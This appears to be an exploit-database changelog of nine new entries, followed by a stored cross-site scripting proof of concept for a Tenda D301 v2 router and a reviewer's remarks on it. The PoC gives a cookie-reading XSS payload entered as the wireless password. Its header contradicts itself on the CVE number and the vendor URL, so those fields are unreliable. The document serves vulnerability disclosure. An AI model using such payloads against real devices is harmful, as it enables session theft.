
9 changes to exploits/shellcodes

Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData
SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation
Xymon 4.3.25 - useradm Command Execution (Metasploit)
Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting
MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting
Sahi Pro 8.0.0 - Remote Command Execution
Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting
Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution
Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)
# Exploit Title: tenda D301 v2 modem router stored xss CVE-2019-13492
# Exploit Author: ABDO10
# Date : July, 11th 2019
# Product : Tenda D301 v2 Modem Router
# version : v2
# Vendor Homepage: https://www.tp-link.com/au/home-networking/dsl-modem-router/td-w8960n/
# Tested on: Linux
# CVE : 2019-13491
# Poc Instructions :
/*******************************************************************************************************************/
> 1 - Open modem router on web browser default(192.168.1.1)
> 2 - Click on advanced -> Wireless -> Security
> 3 - fill this payload : <img src="xy" OnError=prompt(document.cookie)> as password
> 4 - Click on "click to display"
/*******************************************************************************************************************/
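
Review bot: the header metadata contradicts itself in two places. The "# Exploit Title" line cites CVE-2019-13492 while the "# CVE" field says 2019-13491, and the "# Vendor Homepage" URL points at a tp-link.com page for the td-w8960n although "# Product" names a Tenda D301 v2. Make the two CVE references agree and point the homepage at the vendor of the named product, since anyone matching this entry against an asset inventory or an advisory feed will key on those fields. The "# version" field also only repeats the "v2" from the product name, so adding the firmware build that was tested would let defenders tell whether their units are affected. In the PoC, steps 3 and 4 indicate that the wireless password value is stored and later written into the page unescaped when "click to display" is used; a sentence stating that root cause would make clear that the fix is output encoding of the stored password field.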